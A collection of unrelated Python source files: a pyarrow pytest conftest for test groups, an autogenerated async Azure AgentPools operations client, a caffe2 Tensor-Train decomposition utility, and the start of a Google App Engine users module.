h.settings.register_profile('debug', max_examples=10,
verbosity=h.Verbosity.verbose)
# load default hypothesis profile, either set HYPOTHESIS_PROFILE environment
# variable or pass --hypothesis-profile option to pytest, to see the generated
# examples try: pytest pyarrow -sv --only-hypothesis --hypothesis-profile=debug
h.settings.load_profile(os.environ.get('HYPOTHESIS_PROFILE', 'dev'))
groups = [
'cython',
'hypothesis',
'fastparquet',
'gandiva',
'hdfs',
'large_memory',
'orc',
'pandas',
'parquet',
'plasma',
's3',
'tensorflow',
'flight'
]
defaults = {
'cython': False,
'fastparquet': False,
'hypothesis': False,
'gandiva': False,
'hdfs': False,
'large_memory': False,
'orc': False,
'pandas': False,
'parquet': False,
'plasma': False,
's3': False,
'tensorflow': False,
'flight': False,
}
try:
import cython # noqa
defaults['cython'] = True
except ImportError:
pass
try:
import fastparquet # noqa
defaults['fastparquet'] = True
except ImportError:
pass
try:
import pyarrow.gandiva # noqa
defaults['gandiva'] = True
except ImportError:
pass
try:
import pyarrow.orc # noqa
defaults['orc'] = True
except ImportError:
pass
try:
import pandas # noqa
defaults['pandas'] = True
except ImportError:
pass
try:
import pyarrow.parquet # noqa
defaults['parquet'] = True
except ImportError:
pass
try:
import pyarrow.plasma as plasma # noqa
defaults['plasma'] = True
except ImportError:
pass
try:
import tensorflow # noqa
defaults['tensorflow'] = True
except ImportError:
pass
try:
import pyarrow.flight # noqa
defaults['flight'] = True
except ImportError:
pass
def pytest_configure(config):
for mark in groups:
config.addinivalue_line(
"markers", mark,
)
def pytest_addoption(parser):
def bool_env(name, default=None):
value = os.environ.get(name.upper())
if value is None:
return default
value = value.lower()
if value in {'1', 'true', 'on', 'yes', 'y'}:
return True
elif value in {'0', 'false', 'off', 'no', 'n'}:
return False
else:
raise ValueError('{}={} is not parsable as boolean'
.format(name.upper(), value))
for group in groups:
for flag, envvar in [('--{}', 'PYARROW_TEST_{}'),
('--enable-{}', 'PYARROW_TEST_ENABLE_{}')]:
default = bool_env(envvar.format(group), defaults[group])
parser.addoption(flag.format(group),
action='store_true', default=default,
help=('Enable the {} test group'.format(group)))
default = bool_env('PYARROW_TEST_DISABLE_{}'.format(group), False)
parser.addoption('--disable-{}'.format(group),
action='store_true', default=default,
help=('Disable the {} test group'.format(group)))
default = bool_env('PYARROW_TEST_ONLY_{}'.format(group), False)
parser.addoption('--only-{}'.format(group),
action='store_true', default=default,
help=('Run only the {} test group'.format(group)))
parser.addoption('--runslow', action='store_true',
default=False, help='run slow tests')
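# Example invocations implied by the options above (illustrative):
#     pytest pyarrow --only-parquet            # run just the parquet group
#     PYARROW_TEST_PANDAS=1 pytest pyarrow     # enable the pandas group via env var
#     pytest pyarrow --disable-hdfs --runslow  # force-skip hdfs, include slow tests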
def pytest_collection_modifyitems(config, items):
if not config.getoption('--runslow'):
skip_slow = pytest.mark.skip(reason='need --runslow option to run')
for item in items:
if 'slow' in item.keywords:
item.add_marker(skip_slow)
def pytest_runtest_setup(item):
only_set = False
item_marks = {mark.name: mark for mark in item.iter_markers()}
for group in groups:
flag = '--{0}'.format(group)
only_flag = '--only-{0}'.format(group)
enable_flag = '--enable-{0}'.format(group)
disable_flag = '--disable-{0}'.format(group)
if item.config.getoption(only_flag):
only_set = True
elif group in item_marks:
is_enabled = (item.config.getoption(flag) or
item.config.getoption(enable_flag))
is_disabled = item.config.getoption(disable_flag)
if is_disabled or not is_enabled:
pytest.skip('{0} NOT enabled'.format(flag))
if only_set:
skip_item = True
for group in groups:
only_flag = '--only-{0}'.format(group)
if group in item_marks and item.config.getoption(only_flag):
skip_item = False
if skip_item:
pytest.skip('Only running some groups with only flags')
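# Hedged illustration (not part of the original conftest): a test opts into a
# group by carrying the matching marker, and is then skipped unless that group
# is enabled via --<group>, --enable-<group>, or PYARROW_TEST_<GROUP>=1:
#
#   @pytest.mark.pandas
#   def test_pandas_roundtrip():
#       ...
#
#   $ pytest pyarrow --pandas        # also run pandas-marked tests
#   $ pytest pyarrow --only-pandas   # run nothing but pandas-marked tests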
@pytest.fixture
def tempdir(tmpdir):
# convert pytest's LocalPath to pathlib.Path
return pathlib.Path(tmpdir.strpath)
@pytest.fixture(scope='session')
def datadir():
return pathlib.Path(__file__).parent / 'data'
| |
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
import functools
from typing import Any, AsyncIterable, Callable, Dict, Generic, Optional, TypeVar, Union
import warnings
from azure.core.async_paging import AsyncItemPaged, AsyncList
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse
from azure.core.polling import AsyncLROPoller, AsyncNoPolling, AsyncPollingMethod
from azure.core.rest import HttpRequest
from azure.core.tracing.decorator import distributed_trace
from azure.core.tracing.decorator_async import distributed_trace_async
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.async_arm_polling import AsyncARMPolling
from ... import models as _models
from ..._vendor import _convert_request
from ...operations._agent_pools_operations import build_create_or_update_request_initial, build_delete_request_initial, build_get_available_agent_pool_versions_request, build_get_request, build_get_upgrade_profile_request, build_list_request
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class AgentPoolsOperations:
"""AgentPoolsOperations async operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.containerservice.v2020_01_01.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer) -> None:
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
@distributed_trace
def list(
self,
resource_group_name: str,
resource_name: str,
**kwargs: Any
) -> AsyncIterable["_models.AgentPoolListResult"]:
"""Gets a list of agent pools in the specified managed cluster.
Gets a list of agent pools in the specified managed cluster. The operation returns properties
of each agent pool.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param resource_name: The name of the managed cluster resource.
:type resource_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either AgentPoolListResult or the result of cls(response)
:rtype:
~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.containerservice.v2020_01_01.models.AgentPoolListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.AgentPoolListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
def prepare_request(next_link=None):
if not next_link:
request = build_list_request(
subscription_id=self._config.subscription_id,
resource_group_name=resource_group_name,
resource_name=resource_name,
template_url=self.list.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
else:
request = build_list_request(
subscription_id=self._config.subscription_id,
resource_group_name=resource_group_name,
resource_name=resource_name,
template_url=next_link,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
request.method = "GET"
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize("AgentPoolListResult", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ContainerService/managedClusters/{resourceName}/agentPools'} # type: ignore
@distributed_trace_async
async def get(
self,
resource_group_name: str,
resource_name: str,
agent_pool_name: str,
**kwargs: Any
) -> "_models.AgentPool":
"""Gets the agent pool.
Gets the details of the agent pool by managed cluster and resource group.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param resource_name: The name of the managed cluster resource.
:type resource_name: str
:param agent_pool_name: The name of the agent pool.
:type agent_pool_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: AgentPool, or the result of cls(response)
:rtype: ~azure.mgmt.containerservice.v2020_01_01.models.AgentPool
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.AgentPool"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_get_request(
subscription_id=self._config.subscription_id,
resource_group_name=resource_group_name,
resource_name=resource_name,
agent_pool_name=agent_pool_name,
template_url=self.get.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('AgentPool', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ContainerService/managedClusters/{resourceName}/agentPools/{agentPoolName}'} # type: ignore
async def _create_or_update_initial(
self,
resource_group_name: str,
resource_name: str,
agent_pool_name: str,
parameters: "_models.AgentPool",
**kwargs: Any
) -> "_models.AgentPool":
cls = kwargs.pop('cls', None) # type: ClsType["_models.AgentPool"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
_json = self._serialize.body(parameters, 'AgentPool')
request = build_create_or_update_request_initial(
subscription_id=self._config.subscription_id,
resource_group_name=resource_group_name,
resource_name=resource_name,
agent_pool_name=agent_pool_name,
content_type=content_type,
json=_json,
template_url=self._create_or_update_initial.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize('AgentPool', pipeline_response)
if response.status_code == 201:
deserialized = self._deserialize('AgentPool', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_create_or_update_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ContainerService/managedClusters/{resourceName}/agentPools/{agentPoolName}'} # type: ignore
@distributed_trace_async
async def begin_create_or_update(
self,
resource_group_name: str,
resource_name: str,
agent_pool_name: str,
parameters: "_models.AgentPool",
**kwargs: Any
) -> AsyncLROPoller["_models.AgentPool"]:
"""Creates or updates an agent pool.
Creates or updates an agent pool in the specified managed cluster.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param resource_name: The name of the managed cluster resource.
:type resource_name: str
:param agent_pool_name: The name of the agent pool.
:type agent_pool_name: str
:param parameters: Parameters supplied to the Create or Update an agent pool operation.
:type parameters: ~azure.mgmt.containerservice.v2020_01_01.models.AgentPool
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling. Pass in False for
this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either AgentPool or the result of
cls(response)
:rtype:
~azure.core.polling.AsyncLROPoller[~azure.mgmt.containerservice.v2020_01_01.models.AgentPool]
:raises: ~azure.core.exceptions.HttpResponseError
"""
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
polling = kwargs.pop('polling', True) # type: Union[bool, azure.core.polling.AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["_models.AgentPool"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._create_or_update_initial(
resource_group_name=resource_group_name,
resource_name=resource_name,
agent_pool_name=agent_pool_name,
parameters=parameters,
content_type=content_type,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
def get_long_running_output(pipeline_response):
response = pipeline_response.http_response
deserialized = self._deserialize('AgentPool', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
if polling is True: polling_method = AsyncARMPolling(lro_delay, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ContainerService/managedClusters/{resourceName}/agentPools/{agentPoolName}'} # type: ignore
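# Hedged LRO usage sketch (client and resource names below are illustrative,
# not part of this generated file): awaiting the poller's result yields the
# final AgentPool once the service reports the operation as complete.
#
#   poller = await client.agent_pools.begin_create_or_update(
#       "my-rg", "my-cluster", "nodepool1", parameters)
#   agent_pool = await poller.result()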
async def _delete_initial(
self,
resource_group_name: str,
resource_name: str,
agent_pool_name: str,
**kwargs: Any
) -> None:
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_delete_request_initial(
subscription_id=self._config.subscription_id,
resource_group_name=resource_group_name,
resource_name=resource_name,
agent_pool_name=agent_pool_name,
template_url=self._delete_initial.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [202, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
_delete_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ContainerService/managedClusters/{resourceName}/agentPools/{agentPoolName}'} # type: ignore
@distributed_trace_async
async def begin_delete(
self,
resource_group_name: str,
resource_name: str,
agent_pool_name: str,
**kwargs: Any
) -> AsyncLROPoller[None]:
"""Deletes an agent pool.
Deletes the agent pool in the specified managed cluster.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param resource_name: The name of the managed cluster resource.
:type resource_name: str
:param agent_pool_name: The name of the agent pool.
:type agent_pool_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling. Pass in False for
this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either None or the result of cls(response)
:rtype: ~azure.core.polling.AsyncLROPoller[None]
:raises: ~azure.core.exceptions.HttpResponseError
"""
polling = kwargs.pop('polling', True) # type: Union[bool, azure.core.polling.AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType[None]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._delete_initial(
resource_group_name=resource_group_name,
resource_name=resource_name,
agent_pool_name=agent_pool_name,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
def get_long_running_output(pipeline_response):
if cls:
return cls(pipeline_response, None, {})
if polling is True: polling_method = AsyncARMPolling(lro_delay, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ContainerService/managedClusters/{resourceName}/agentPools/{agentPoolName}'} # type: ignore
@distributed_trace_async
async def get_upgrade_profile(
self,
resource_group_name: str,
resource_name: str,
agent_pool_name: str,
**kwargs: Any
) -> "_models.AgentPoolUpgradeProfile":
"""Gets upgrade profile for an agent pool.
Gets the details of the upgrade profile for an agent pool with a specified resource group and
managed cluster name.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param resource_name: The name of the managed cluster resource.
:type resource_name: str
:param agent_pool_name: The name of the agent pool.
:type agent_pool_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: AgentPoolUpgradeProfile, or the result of cls(response)
:rtype: ~azure.mgmt.containerservice.v2020_01_01.models.AgentPoolUpgradeProfile
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.AgentPoolUpgradeProfile"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_get_upgrade_profile_request(
subscription_id=self._config.subscription_id,
resource_group_name=resource_group_name,
resource_name=resource_name,
agent_pool_name=agent_pool_name,
template_url=self.get_upgrade_profile.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('AgentPoolUpgradeProfile', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_upgrade_profile.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ContainerService/managedClusters/{resourceName}/agentPools/{agentPoolName}/upgradeProfiles/default'} # type: ignore
@distributed_trace_async
async def get_available_agent_pool_versions(
self,
resource_group_name: str,
resource_name: str,
**kwargs: Any
) -> "_models.AgentPoolAvailableVersions":
"""Gets a list of supported versions for the specified agent pool.
Gets a list of supported versions for the specified agent pool.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param resource_name: The name of the managed cluster resource.
:type resource_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: AgentPoolAvailableVersions, or the result of cls(response)
:rtype: ~azure.mgmt.containerservice.v2020_01_01.models.AgentPoolAvailableVersions
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.AgentPoolAvailableVersions"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_get_available_agent_pool_versions_request(
subscription_id=self._config.subscription_id,
resource_group_name=resource_group_name,
resource_name=resource_name,
template_url=self.get_available_agent_pool_versions.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('AgentPoolAvailableVersions', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_available_agent_pool_versions.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ContainerService/managedClusters/{resourceName}/availableAgentPoolVersions'} # type: ignore
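# Hedged usage sketch (not part of the generated file): these operations are
# normally reached through the versioned management client rather than by
# constructing AgentPoolsOperations directly. The credential and client
# classes named below are assumptions based on the wider azure-mgmt SDK.
#
#   from azure.identity.aio import DefaultAzureCredential
#   from azure.mgmt.containerservice.v2020_01_01.aio import ContainerServiceClient
#
#   async def list_pools():
#       async with ContainerServiceClient(
#               DefaultAzureCredential(), subscription_id="<sub-id>") as client:
#           async for pool in client.agent_pools.list("my-rg", "my-cluster"):
#               print(pool.name)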
| |
# Copyright (c) 2016-present, Facebook, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
##############################################################################
## @package tt_core
# Module caffe2.python.tt_core
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
"""
The following methods are various utility methods for using the Tensor-Train
decomposition, or TT-decomposition introduced by I. V. Oseledets (2011) in his
paper (http://epubs.siam.org/doi/abs/10.1137/090752286).
Broadly speaking, these methods are used to replace fully connected layers in
neural networks with Tensor-Train layers introduced by A. Novikov et. al. (2015)
in their paper (http://arxiv.org/abs/1509.06569). More details about each of
the methods are provided in each respective docstring.
"""
def init_tt_cores(inp_sizes, out_sizes, tt_ranks, seed=1234):
"""
Initialize randomized orthogonalized TT-cores.
This method should be used when a TT-layer is trained from scratch. The
sizes of each of the cores are specified by the inp_sizes and out_sizes, and
the respective tt_ranks will dictate the ranks of each of the cores. Note
that larger tt_ranks yield more accurate approximations at the cost of
slower computation. The size of the ith core is:
tt_ranks[i] * inp_sizes[i] * out_sizes[i] * tt_ranks[i + 1].
Note that the following relationship between the input lengths is expected:
len(inp_sizes) == len(out_sizes) == len(tt_ranks) - 1.
Args:
inp_sizes: list of the input dimensions of the respective cores
out_sizes: list of the output dimensions of the respective cores
tt_ranks: list of the ranks of the respective cores
seed: integer to seed the random number generator
Returns:
cores: One-dimensional array of cores concatenated along an axis
"""
np.random.seed(seed)
# Assert that the sizes of the inputs are consistent
assert(len(inp_sizes) == len(out_sizes)), \
"The number of input dimensions (" + str(len(inp_sizes)) + \
") must be equal to the number of output dimensions (" + \
str(len(out_sizes)) + ")."
assert(len(tt_ranks) == len(inp_sizes) + 1), \
"The number of tt-ranks (" + str(len(tt_ranks)) + ") must be " + \
"one more than the number of input and output dims (" + \
str(len(out_sizes)) + ")."
# Convert to numpy arrays
inp_sizes = np.array(inp_sizes)
out_sizes = np.array(out_sizes)
tt_ranks = np.array(tt_ranks)
# Initialize the cores array
cores_len = np.sum(
inp_sizes * out_sizes * tt_ranks[1:] * tt_ranks[:-1])
cores = np.zeros(cores_len)
cores_idx = 0
rv = 1
# Compute the full list of cores by computing each individual one
for i in range(inp_sizes.shape[0]):
shape = [tt_ranks[i],
inp_sizes[i],
out_sizes[i],
tt_ranks[i + 1]]
# Precompute the shape of each core
tall_shape = (np.prod(shape[:3]), shape[3])
# Randomly initialize the current core using a normal distribution
curr_core = np.dot(rv, np.random.normal(
0, 1, size=(shape[0], np.prod(shape[1:]))))
curr_core = curr_core.reshape(tall_shape)
# Orthogonalize the initialized current core and append to cores list
if i < inp_sizes.shape[0] - 1:
curr_core, rv = np.linalg.qr(curr_core)
cores[cores_idx:cores_idx +
curr_core.size] = curr_core.flatten()
cores_idx += curr_core.size
# Normalize the list of arrays using this Glorot-style trick
glorot_style = (np.prod(inp_sizes) *
np.prod(tt_ranks))**(1.0 / inp_sizes.shape[0])
return (0.1 / glorot_style) * np.array(cores).astype(np.float32)
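# Hedged example (shapes illustrative): cores for a 256 -> 64 TT-layer,
# factorized as inp_sizes=[4, 8, 8] (product 256) and out_sizes=[4, 4, 4]
# (product 64); the boundary ranks must be 1 in TT-format.
#
#   cores = init_tt_cores([4, 8, 8], [4, 4, 4], [1, 3, 3, 1])
#   assert cores.size == 1*4*4*3 + 3*8*4*3 + 3*8*4*1  # == 432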
def matrix_to_tt(W, inp_sizes, out_sizes, tt_ranks):
"""
Convert a matrix into the TT-format.
This method will consume a 2D weight matrix such as those used in fully
connected layers in a neural network and will compute the TT-decomposition
of the weight matrix and return the TT-cores of the resulting computation.
This method should be used when converting a trained fully connected layer
into a TT-layer for increased speed and decreased parameter size. The size
of the ith core is:
tt_ranks[i] * inp_sizes[i] * out_sizes[i] * tt_ranks[i + 1].
Note that the following relationship between the input lengths is expected:
len(inp_sizes) == len(out_sizes) == len(tt_ranks) - 1.
We also require that np.prod(inp_sizes) == W.shape[0] and that
np.prod(out_sizes) == W.shape[1].
Args:
W: two-dimensional weight matrix numpy array representing a fully
connected layer to be converted to TT-format; note that the weight
matrix is transposed before being decomposed because we want to emulate the
X * W^T operation that the FC layer performs.
inp_sizes: list of the input dimensions of the respective cores
out_sizes: list of the output dimensions of the respective cores
tt_ranks: list of the ranks of the respective cores
Returns:
new_cores: One-dimensional array of cores concatenated along an axis
"""
# Assert that the sizes of the inputs are consistent
assert(len(inp_sizes) == len(out_sizes)), \
"The number of input dimensions (" + str(len(inp_sizes)) + \
") must be equal to the number of output dimensions (" + \
str(len(out_sizes)) + ")."
assert(len(tt_ranks) == len(inp_sizes) + 1), \
"The number of tt-ranks (" + str(len(tt_ranks)) + ") must be " + \
"one more than the number of input and output dimensions (" + \
str(len(out_sizes)) + ")."
assert(W.shape[0] == np.prod(inp_sizes)), \
"The product of the input sizes (" + str(np.prod(inp_sizes)) + \
") must be equal to first dimension of W (" + str(W.shape[0]) + ")."
assert(W.shape[1] == np.prod(out_sizes)), \
"The product of the output sizes (" + str(np.prod(out_sizes)) + \
") must be equal to second dimension of W (" + str(W.shape[1]) + ")."
# W is transposed so that the multiplication X * W^T can be computed, just
# as it is in the FC layer.
W = W.transpose()
# Convert to numpy arrays
inp_sizes = np.array(inp_sizes)
out_sizes = np.array(out_sizes)
tt_ranks = np.array(tt_ranks)
# Copy the original weight matrix in order to permute and reshape the weight
# matrix. In addition, the inp_sizes and out_sizes are combined to a single
# sizes array to use the tt_svd helper method, which only consumes a single
# sizes array.
W_copy = W.copy()
total_inp_size = inp_sizes.size
W_copy = np.reshape(W_copy, np.concatenate((inp_sizes, out_sizes)))
order = np.repeat(np.arange(0, total_inp_size), 2) + \
np.tile([0, total_inp_size], total_inp_size)
W_copy = np.transpose(W_copy, axes=order)
W_copy = np.reshape(W_copy, inp_sizes * out_sizes)
# Use helper method to convert the W matrix copy into the preliminary
# cores array.
cores = tt_svd(W_copy, inp_sizes * out_sizes, tt_ranks)
# Permute the dimensions of each of the cores to be compatible with the
# TT-layer.
new_cores = np.zeros(cores.shape).astype(np.float32)
idx = 0
for i in range(len(inp_sizes)):
shape = (tt_ranks[i], inp_sizes[i], out_sizes[i], tt_ranks[i + 1])
current_core = cores[idx:idx + np.prod(shape)].reshape(shape)
current_core = current_core.transpose((1, 3, 0, 2))
new_cores[new_cores.shape[0] - idx - np.prod(shape):
new_cores.shape[0] - idx] \
= current_core.flatten()
idx += np.prod(shape)
return new_cores
def tt_svd(W, sizes, tt_ranks):
"""
Helper method for the matrix_to_tt() method performing the TT-SVD
decomposition.
Uses the TT-decomposition algorithm to convert a matrix to TT-format using
multiple reduced SVD operations.
Args:
W: two-dimensional weight matrix representing a fully connected layer to
be converted to TT-format preprocessed by the matrix_to_tt() method.
sizes: list of the dimensions of each of the cores
tt_ranks: list of the ranks of the respective cores
Returns:
cores: One-dimensional array of cores concatenated along an axis
"""
assert(len(tt_ranks) == len(sizes) + 1)
C = W.copy()
total_size = sizes.size
core = np.zeros(np.sum(tt_ranks[:-1] * sizes * tt_ranks[1:]),
dtype='float32')
# Compute iterative reduced SVD operations and store each resulting U matrix
# as an individual core.
pos = 0
for i in range(0, total_size - 1):
shape = tt_ranks[i] * sizes[i]
C = np.reshape(C, [shape, -1])
U, S, V = np.linalg.svd(C, full_matrices=False)
U = U[:, 0:tt_ranks[i + 1]]
S = S[0:tt_ranks[i + 1]]
V = V[0:tt_ranks[i + 1], :]
core[pos:pos + tt_ranks[i] * sizes[i] * tt_ranks[i + 1]] = U.ravel()
pos += tt_ranks[i] * sizes[i] * tt_ranks[i + 1]
C = np.dot(np.diag(S), V)
core[pos:pos + tt_ranks[total_size - 1] *
sizes[total_size - 1] * tt_ranks[total_size]] = C.ravel()
return core
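# Hedged round-trip sketch (sizes illustrative): decompose a random FC weight
# matrix whose input/output dimensions factor as in the example above.
#
#   W = np.random.randn(256, 64).astype(np.float32)
#   cores = matrix_to_tt(W, [4, 8, 8], [4, 4, 4], [1, 3, 3, 1])
#   assert cores.size == 432  # sum of tt_ranks[i]*inp[i]*out[i]*tt_ranks[i+1]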
# TODO(Surya) Write a method to convert an entire network where all fully
# connected layers are replaced by a TT layer.
def fc_net_to_tt_net(net):
pass
| |
#!/usr/bin/env python
#
# Copyright 2007 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""The User Python datastore class to be used as a datastore data type."""
import os
